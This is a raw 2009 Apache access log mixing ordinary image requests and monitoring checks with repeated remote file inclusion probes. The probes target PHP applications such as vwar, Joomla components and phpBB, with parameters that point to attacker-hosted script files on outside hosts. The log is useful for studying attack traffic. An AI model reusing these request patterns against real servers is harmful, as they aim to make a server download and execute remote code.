216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:54 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:55 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:20:05 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.172.33.230 - - [05/Aug/2009:09:20:08 -0400] "GET /logs/access_log.Q109060200%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.812"
63.174.244.10 - - [05/Aug/2009:09:20:12 -0400] "GET /logs/access_log.Q109063000//faqsupport/samplefaqsupport.php?path[docroot]=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
63.174.244.10 - - [05/Aug/2009:09:20:19 -0400] "GET /logs/access_log.Q109072900//faqsupport/samplefaqsupport.php?path[docroot]=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:09:20:38 -0400] "GET /logs/access_log.Q109060200%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
204.12.11.202 - - [05/Aug/2009:09:20:51 -0400] "GET /logs/access_log.Q109060200%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.829"
172.16.1.75 - - [05/Aug/2009:09:21:07 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.75 - - [05/Aug/2009:09:21:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.75 - - [05/Aug/2009:09:21:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:09:20:20 -0400] "GET /logs/access_log.Q109080300 HTTP/1.0" 200 4623136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.89.135 - - [05/Aug/2009:09:21:18 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:09:21:23 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.14.192.4 - - [05/Aug/2009:09:21:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.14.192.4 - - [05/Aug/2009:09:21:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.14.192.4 - - [05/Aug/2009:09:22:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.14.192.4 - - [05/Aug/2009:09:22:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
172.16.1.176 - - [05/Aug/2009:09:22:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:09:22:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:09:22:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:09:23:32 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:09:23:32 -0400] "GET /logs/access_log.Q109051200//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:09:23:32 -0400] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:09:23:37 -0400] "GET /logs/access_log.Q109061800//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:09:23:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.82 - - [05/Aug/2009:09:23:51 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:23:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:23:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:24:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:24:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:24:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:24:52 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:24:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:24:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
75.68.2.156 - - [05/Aug/2009:09:25:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
75.68.2.156 - - [05/Aug/2009:09:25:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
75.68.2.156 - - [05/Aug/2009:09:25:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
75.68.2.156 - - [05/Aug/2009:09:25:46 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
203.236.100.30 - - [05/Aug/2009:09:26:10 -0400] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:09:26:10 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:09:26:10 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:09:26:28 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.skyhd.or.kr/Lboard/fx29id.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:09:26:30 -0400] "GET /index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:09:26:30 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:09:26:30 -0400] "GET /logs/index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:09:26:30 -0400] "GET /logs/index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:09:26:30 -0400] "GET /index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:09:26:30 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.91.140.108 - - [05/Aug/2009:09:26:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.91.140.108 - - [05/Aug/2009:09:26:33 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.91.140.108 - - [05/Aug/2009:09:26:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.91.140.108 - - [05/Aug/2009:09:26:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
79.23.191.23 - - [05/Aug/2009:09:26:43 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:09:26:54 -0400] "GET /logs/access_log.Q109060700//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:04 -0400] "GET /logs/access_log.Q109062900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:04 -0400] "GET /logs/access_log.Q109061900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:04 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:04 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:09:27:05 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:09:27:05 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:06 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:09:27:06 -0400] "GET /logs/access_log.Q109061900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:09:27:06 -0400] "GET /logs/access_log.Q109062900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:06 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:06 -0400] "GET /logs/access_log.Q109061900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:06 -0400] "GET /logs/access_log.Q109062900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:08 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:08 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:08 -0400] "GET /logs/access_log.Q109062900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:27:08 -0400] "GET /logs/access_log.Q109061900/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:09:27:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:27:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:27:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
201.232.54.48 - - [05/Aug/2009:09:27:14 -0400] "GET /logs/access_log.Q109072900%20%20/solpot.html?body=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
201.232.54.48 - - [05/Aug/2009:09:27:14 -0400] "GET /solpot.html?body=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
201.232.54.48 - - [05/Aug/2009:09:27:14 -0400] "GET /logs/solpot.html?body=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:09:27:34 -0400] "GET /logs/access_log.Q109071900%20%20/index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.87 - - [05/Aug/2009:09:27:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:27:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:27:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.53.201.178 - - [05/Aug/2009:09:27:57 -0400] "GET /logs/access_log.Q109071900%20%20/index.php?redir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.159 - - [05/Aug/2009:09:28:09 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [05/Aug/2009:09:28:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [05/Aug/2009:09:28:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
201.232.54.48 - - [05/Aug/2009:09:28:38 -0400] "GET /logs/access_log.Q109072900/solpot.html?body=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:09:28:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.141 - - [05/Aug/2009:09:29:02 -0400] "GET /logs/access_log.Q109061900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:29:02 -0400] "GET /logs/access_log.Q109062900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:29:06 -0400] "GET /logs/access_log.Q109062900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:29:06 -0400] "GET /logs/access_log.Q109061900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
172.16.1.82 - - [05/Aug/2009:09:29:13 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:29:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:29:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
93.187.200.218 - - [05/Aug/2009:09:29:19 -0400] "GET /logs/access_log.Q109062900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:09:29:19 -0400] "GET /logs/access_log.Q109061900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:29:20 -0400] "GET /logs/access_log.Q109061900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:09:29:21 -0400] "GET /logs/access_log.Q109062900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:09:29:23 -0400] "GET //includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:09:29:23 -0400] "GET /logs//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
172.16.1.176 - - [05/Aug/2009:09:29:37 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
